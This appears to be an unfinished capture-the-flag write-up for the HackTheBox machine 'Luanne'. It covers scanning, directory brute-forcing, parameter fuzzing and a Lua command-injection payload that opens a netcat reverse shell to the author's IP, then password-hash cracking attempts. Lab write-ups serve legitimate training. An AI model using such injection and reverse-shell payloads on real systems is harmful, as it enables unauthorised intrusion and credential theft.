Just to make life easier, I usually add an entry to my hosts file so the target machine can be reached by name.
Okay now onto the hacking!
As always, I started off with an Nmap scan against the machine.
nmap -Pn -sC -sV -oN initial luanne.htb
Scanning & Enumeration
The scan showed that port 80 was running a web server. This was the web app being served!
I was not authorized to access the site. However, I found a directory which was listed in
Thus, I ran a directory brute force attack against it using gobuster.
I found that /weather/forecast was a valid directory.
Accessing it gave me this message. Going by the message, I inferred which parameter it expected and added it to the URL.
My next order of business was to run a parameter fuzzing attack on ?city=. I used a Burp Suite Intruder attack for that, together with a custom fuzz list I found on GitHub.
The fuzz attack revealed that weather was a .lua file. That got me thinking about whether I could get remote code execution by tampering with the parameter.
The first step was to confirm that the theory would work. For that, I used a simple payload to run the command
Now that I had confirmed RCE, it was time to craft a payload to get a reverse shell. After constructing the payload, I had to URL encode it before sending it.
neewashere') os.execute('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.47 666 >/tmp/f')--
While enumerating, I had found that the machine was running NetBSD. Thus, I picked an OpenBSD-style netcat reverse shell (the mkfifo variant, since this nc has no -e) which I found here.
Now that I had a shell on the machine, I busted out linpeas.sh and tried to enumerate the machine further.
Linpeas revealed a password hash located in the root web directory.
Next up, I fired up john to try and crack the password.
Still trying to crack :(
Haven't even gotten the user flag :(